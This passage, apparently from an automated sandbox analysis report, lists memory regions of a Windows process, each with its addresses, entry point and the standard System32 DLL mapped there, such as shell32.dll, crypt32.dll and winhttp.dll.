monitored = 0 entry_point = 0x7ffc5424f670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 736 start_va = 0x7ffc546f0000 end_va = 0x7ffc5473ffff monitored = 0 entry_point = 0x7ffc54721220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 737 start_va = 0x7ffc548f0000 end_va = 0x7ffc5495cfff monitored = 0 entry_point = 0x7ffc548fd750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 738 start_va = 0x7ffc54af0000 end_va = 0x7ffc54b17fff monitored = 0 entry_point = 0x7ffc54af8c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 739 start_va = 0x7ffc54b20000 end_va = 0x7ffc54b39fff monitored = 0 entry_point = 0x7ffc54b22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 740 start_va = 0x7ffc54d00000 end_va = 0x7ffc54d97fff monitored = 0 entry_point = 0x7ffc54d23980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 741 start_va = 0x7ffc54da0000 end_va = 0x7ffc54e3ffff monitored = 0 entry_point = 0x7ffc54dc56b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 742 start_va = 0x7ffc54fb0000 end_va = 0x7ffc54febfff monitored = 0 entry_point = 0x7ffc54fb25e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 743 start_va = 0x7ffc54ff0000 end_va = 0x7ffc55077fff monitored = 0 entry_point = 0x7ffc55004510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 744 start_va = 0x7ffc55190000 end_va = 0x7ffc551a5fff monitored = 0 entry_point = 0x7ffc551919f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 745 start_va = 0x7ffc551d0000 end_va = 0x7ffc55270fff monitored = 0 entry_point = 0x7ffc551d3db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 746 start_va = 0x7ffc552a0000 end_va = 0x7ffc5530ffff monitored = 0 entry_point = 0x7ffc552c2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 747 start_va = 0x7ffc55360000 end_va = 0x7ffc55378fff monitored = 0 entry_point = 0x7ffc55364520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 748 start_va = 0x7ffc553a0000 end_va = 0x7ffc55421fff monitored = 0 entry_point = 0x7ffc553a4ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 749 start_va = 0x7ffc55820000 end_va = 0x7ffc55857fff monitored = 0 entry_point = 0x7ffc55838cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 750 start_va = 0x7ffc55860000 end_va = 0x7ffc5586afff monitored = 0 entry_point = 0x7ffc55861d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 751 start_va = 0x7ffc55aa0000 end_va = 0x7ffc55c5cfff monitored = 0 entry_point = 0x7ffc55acaf90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 752 start_va = 0x7ffc55c60000 end_va = 0x7ffc55fe1fff monitored = 0 entry_point = 0x7ffc55cb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 753 start_va = 0x7ffc57030000 end_va = 0x7ffc570d8fff monitored = 0 entry_point = 0x7ffc57059010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 754 start_va = 0x7ffc570e0000 end_va = 0x7ffc571edfff monitored = 0 entry_point = 0x7ffc5712eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 755 start_va = 0x7ffc571f0000 end_va = 0x7ffc57259fff monitored = 0 entry_point = 0x7ffc571f9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 756 start_va = 0x7ffc57260000 end_va = 0x7ffc5726bfff monitored = 0 entry_point = 0x7ffc57261470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 757 start_va = 0x7ffc57270000 end_va = 0x7ffc572ccfff monitored = 0 entry_point = 0x7ffc57276c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 758 start_va = 0x7ffc572d0000 end_va = 0x7ffc57320fff monitored = 0 entry_point = 0x7ffc572d25e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 759 start_va = 0x7ffc57330000 end_va = 0x7ffc574effff monitored = 0 entry_point = 0x7ffc57339e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 760 start_va = 0x7ffc57590000 end_va = 0x7ffc57609fff monitored = 0 entry_point = 0x7ffc575b7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 761 start_va = 0x7ffc57650000 end_va = 0x7ffc57665fff monitored = 0 entry_point = 0x7ffc57651b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 762 start_va = 0x7ffc57670000 end_va = 0x7ffc576d3fff monitored = 0 entry_point = 0x7ffc57685ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 763 start_va = 0x7ffc578a0000 end_va = 0x7ffc5794dfff monitored = 0 entry_point = 0x7ffc578b80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 764 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57af4fff monitored = 0 entry_point = 0x7ffc57aa3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 765 start_va = 0x7ffc57b60000 end_va = 0x7ffc57ba0fff monitored = 0 entry_point = 0x7ffc57b64840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 766 start_va = 0x7ffc57bb0000 end_va = 0x7ffc57ce5fff monitored = 0 entry_point = 0x7ffc57bdf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 767 start_va = 0x7ffc57e70000 end_va = 0x7ffc57f37fff monitored = 0 entry_point = 0x7ffc57eb13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 768 start_va = 0x7ffc57f40000 end_va = 0x7ffc57fa0fff monitored = 0 entry_point = 0x7ffc57f44b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 769 start_va = 0x7ffc58230000 end_va = 0x7ffc582c1fff monitored = 0 entry_point = 0x7ffc5827a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 770 start_va = 0x7ffc58390000 end_va = 0x7ffc588d4fff monitored = 0 entry_point = 0x7ffc5852a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 771 start_va = 0x7ffc588e0000 end_va = 0x7ffc58b4efff monitored = 0 entry_point = 0x7ffc589922b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 772 start_va = 0x7ffc58c90000 end_va = 0x7ffc58ca3fff monitored = 0 entry_point = 0x7ffc58c950c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 773 start_va = 0x7ffc58cb0000 end_va = 0x7ffc58ccffff monitored = 0 entry_point = 0x7ffc58cb1920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 774 start_va = 0x7ffc58d40000 end_va = 0x7ffc58d50fff monitored = 0 entry_point = 0x7ffc58d43320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 775 start_va = 0x7ffc59140000 end_va = 0x7ffc5918afff monitored = 0 entry_point = 0x7ffc591572b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 776 start_va = 0x7ffc59190000 end_va = 0x7ffc59340fff monitored = 0 entry_point = 0x7ffc592261a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 777 start_va = 0x7ffc59350000 end_va = 0x7ffc59415fff monitored = 0 entry_point = 0x7ffc59353ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 778 start_va = 0x7ffc59420000 end_va = 0x7ffc5945ffff monitored = 0 entry_point = 0x7ffc59433750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 779 start_va = 0x7ffc594c0000 end_va = 0x7ffc594f2fff monitored = 0 entry_point = 0x7ffc594c3800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 780 start_va = 0x7ffc59500000 end_va = 0x7ffc59992fff monitored = 0 entry_point = 0x7ffc5950f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 781 start_va = 0x7ffc599a0000 end_va = 0x7ffc59a06fff monitored = 0 entry_point = 0x7ffc599be710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 782 start_va = 0x7ffc59a10000 end_va = 0x7ffc59a5efff monitored = 0 entry_point = 0x7ffc59a17ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 783 start_va = 0x7ffc59a60000 end_va = 0x7ffc59b01fff monitored = 0 entry_point = 0x7ffc59a80a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 784 start_va = 0x7ffc59b10000 end_va = 0x7ffc59db7fff monitored = 0 entry_point = 0x7ffc59ba3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 785 start_va = 0x7ffc59dc0000 end_va = 0x7ffc59de1fff monitored = 0 entry_point = 0x7ffc59dc1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 786 start_va = 0x7ffc59e10000 end_va = 0x7ffc59ecdfff monitored = 0 entry_point = 0x7ffc59e52d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 787 start_va = 0x7ffc59ed0000 end_va = 0x7ffc59fb2fff monitored = 0 entry_point = 0x7ffc59f07da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 788 start_va = 0x7ffc5a2c0000 end_va = 0x7ffc5a2d2fff monitored = 0 entry_point = 0x7ffc5a2c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 789 start_va = 0x7ffc5a2e0000 end_va = 0x7ffc5a358fff monitored = 0 entry_point = 0x7ffc5a2ffb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 790 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 791 start_va = 0x7ffc5a530000 end_va = 0x7ffc5a54bfff monitored = 0 entry_point = 0x7ffc5a5337a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 792 start_va = 0x7ffc5a550000 end_va = 0x7ffc5a55bfff monitored = 0 entry_point = 0x7ffc5a551860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 793 start_va = 0x7ffc5a560000 end_va = 0x7ffc5a575fff monitored = 0 entry_point = 0x7ffc5a563380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 794 start_va = 0x7ffc5a580000 end_va = 0x7ffc5a58afff monitored = 0 entry_point = 0x7ffc5a581a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 795 start_va = 0x7ffc5a590000 end_va = 0x7ffc5a5b4fff monitored = 0 entry_point = 0x7ffc5a592300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 796 start_va = 0x7ffc5a5f0000 end_va = 0x7ffc5a614fff monitored = 0 entry_point = 0x7ffc5a605220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 797 start_va = 0x7ffc5a650000 end_va = 0x7ffc5a664fff monitored = 0 entry_point = 0x7ffc5a652850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 798 start_va = 0x7ffc5a6b0000 end_va = 0x7ffc5a6d2fff monitored = 0 entry_point = 0x7ffc5a6b99a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 799 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 800 start_va = 0x7ffc5a850000 end_va = 0x7ffc5a876fff monitored = 0 entry_point = 0x7ffc5a857940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 801 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 802 start_va = 0x7ffc5a950000 end_va = 0x7ffc5aa4ffff monitored = 0 entry_point = 0x7ffc5a990f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 803 start_va = 0x7ffc5abf0000 end_va = 0x7ffc5ac19fff monitored = 0 entry_point = 0x7ffc5abf8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 804 start_va = 0x7ffc5afd0000 end_va = 0x7ffc5b0c3fff monitored = 0 entry_point = 0x7ffc5afda960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 805 start_va = 0x7ffc5b240000 end_va = 0x7ffc5b24bfff monitored = 0 entry_point = 0x7ffc5b2427e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 806 start_va = 0x7ffc5b320000 end_va = 0x7ffc5b350fff monitored = 0 entry_point = 0x7ffc5b327d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 807 start_va = 0x7ffc5b380000 end_va = 0x7ffc5b3f9fff monitored = 0 entry_point = 0x7ffc5b3a1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 808 start_va = 0x7ffc5b480000 end_va = 0x7ffc5b489fff monitored = 0 entry_point = 0x7ffc5b481830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 809 start_va = 0x7ffc5b590000 end_va = 0x7ffc5b5aefff monitored = 0 entry_point = 0x7ffc5b595d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 810 start_va = 0x7ffc5b700000 end_va = 0x7ffc5b75bfff monitored = 0 entry_point = 0x7ffc5b716f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 811 start_va = 0x7ffc5b7b0000 end_va = 0x7ffc5b7c6fff monitored = 0 entry_point = 0x7ffc5b7b79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 812 start_va = 0x7ffc5b8d0000 end_va = 0x7ffc5b8dafff monitored = 0 entry_point = 0x7ffc5b8d19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 813 start_va = 0x7ffc5b960000 end_va = 0x7ffc5b999fff monitored = 0 entry_point = 0x7ffc5b968d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 814 start_va = 0x7ffc5b9a0000 end_va = 0x7ffc5b9c6fff monitored = 0 entry_point = 0x7ffc5b9b0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 815 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 816 start_va = 0x7ffc5bc40000 end_va = 0x7ffc5bc95fff monitored = 0 entry_point = 0x7ffc5bc50bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 817 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 818 start_va = 0x7ffc5bcf0000 end_va = 0x7ffc5bd88fff monitored = 0 entry_point = 0x7ffc5bd1f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 819 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 820 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 821 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 822 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 823 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 824 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 825 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 826 start_va = 0x7ffc5c360000 end_va = 0x7ffc5c3b4fff monitored = 0 entry_point = 0x7ffc5c377970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 827 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 828 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 829 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 830 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 831 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 832 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 833 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 834 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 835 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 836 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 837 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 838 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 839 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 840 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 841 start_va = 0x7ffc5eac0000 end_va = 0x7ffc5ec19fff monitored = 0 entry_point = 0x7ffc5eb038e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 842 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 843 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 844 start_va = 0x7ffc5ee90000 end_va = 0x7ffc5f2b8fff monitored = 0 entry_point = 